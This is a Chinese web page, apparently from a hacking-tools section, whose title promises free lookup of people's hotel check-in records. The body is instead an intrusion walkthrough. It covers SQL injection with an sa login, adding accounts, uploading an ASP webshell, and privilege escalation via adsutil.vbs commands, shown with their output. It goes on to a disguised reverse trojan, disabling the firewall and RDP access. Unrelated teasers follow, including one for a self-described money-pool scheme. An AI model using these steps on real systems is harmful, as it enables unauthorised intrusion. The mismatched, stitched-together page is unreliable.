2020免费在线查询开宾馆记录 详细入住记录曝光

访客4年前黑客工具625

 ping www.111.com 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。 

  二、注入 

  从源文件里搜索关键字asp,找到了一个注入点。用nbsi注入,发现是sa口令登陆,去加了一个用户,显示命令完成。哈哈,看来管理员太粗心了。先上传一个webshell,上传了一个老兵的asp木马。接下来的就是个人习惯了,我平时入侵的习惯是先上传webshell,然后再把webshell提升为system权限。因为这样说可以说在入侵之时会非常的方便,我个人觉得这个 *** 非常好。 

  三、提升权限 

  先看哪些特权的: 

  cs cript C:\Inetpub\AdminS cripts\adsutil.vbs get /W3SVC/InProcessIsapiApps 

  得到: 

  Microsoft (R) Windows 脚本宿主版本 5.1 for Windows 

  版权所有(C) Microsoft Corporation 1996-1999. All rights reserved. 

  InProcessIsapiApps : (LIST) (5 Items) 

  "C:\WINNT\system32\idq.dll" 

  "C:\WINNT\system32\inetsrv\httpext.dll" 

  "C:\WINNT\system32\inetsrv\httpodbc.dll" 

  "C:\WINNT\system32\inetsrv\ssinc.dll" 

  "C:\WINNT\system32\msw3prt.dll" 

  把asp.dll加进去: 

  cs cript C:\Inetpub\AdminS cripts\adsutil.vbs 

  set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32 

  \inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32 

  \inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32 

  \inetsrv\asp.dll" 

  然后用asp木马加个用户,显示命令完成。 

  四、TerminalService 

  接下来就是开3389了,用net start显示,发现已开了TS服务,但端口上没有3389,觉得可能是改端口了。但事实上它们欺骗我的感情,我用netstat -an察看了一下,发现有3389,再从net start 里发现是对方的防火墙搞的鬼。算了,上传个木马吧,上传了一个改了特征码的20CN反弹木马,然后用木马在GUI下关掉了防火墙,再用3389登陆器登了上去,这里我这样做是因为我知道管理员一定不会在旁边。而对于这个时候,比较老道的 *** 大家可以用fpipe实现端口重定向,或者用httptunnel。和黑防里面说的那样,不过我试过没有成功过一次,而且我在收集资料里看到黑防的那篇和另外一个高手写的一模一样,不知道谁抄谁。还有一种工具是despoxy,(TCP tunnel for HTTP Proxies)大家有兴趣的话可以去试一下,它可以穿透http *** 。 

相关文章

ios被黑客攻破(iphone被黑客攻击)

ios被黑客攻破(iphone被黑客攻击)

本文导读目录: 1、你的Apple iPad被黑客入侵了 2、您的iphone连接被黑客入侵,有人正在跟踪您? 3、我用苹果Safari浏览网页,出现您的iphone被黑客入侵,黑客会跟踪您在...

热血传奇怎么赚钱?热血传奇能赚人民币吗

热血传奇怎么赚钱?热血传奇能赚人民币吗

在热血传奇中发家的玩家不少,有的把他当成了职业,如何在传奇游戏中赚钱,快速变身土豪玩家?常玩传奇的骨灰级玩家都是轻车熟路,很多不用花钱就可以玩的很爽,他们也不屑于这些,娱乐是他们最大的乐趣,不过很多小...

油页岩是什么(带你读懂油页岩)

油页岩是什么(带你读懂油页岩) 英国石油公司的2019年世界能源统计年鉴指出,截至2019年年初,全球探明石油储量为1.7万亿桶,委内瑞拉石油储量最大,为3030亿桶;其次是沙特的2970亿桶;随后...

部分网页打不开是什么原因(教你一个解决办法

部分网页打不开是什么原因(教你一个解决办法

有的时候,我们想要打开网页进行一些操作的时候,发现部分网页打不开,那么这是什么原因呢? 一、网络设置的问题 这种原因比较多出现在需要手动指定IP、网关、DNS服务器联网方式下,及使用代理服务器上网...

聚享多:新用户免费赚8元以上!

聚享多是一个把挖矿, 购物返利,义务悬赏相结合的平台,不外总体来看,照样属于资金盘性子。新用户注册,实名认证,不刷脸,不交钱,只填简朴信息即可,获得“新手快乐分享包”,预计至少可以免费赚8米以上!...

遭遇百度K站,为什么要多上站长交流论坛!

遭遇百度K站,为什么要多上站长交流论坛!

本日,你去了站长交换论坛吗? 在搜索引擎优化事情中,碰着百度K站是一个常常接头的话题。面临这种环境,第一个时间站长是盲目标,不知道如那里理惩罚它。 纵然有时候,你也无法判定这是不是百度K站。此时,与更...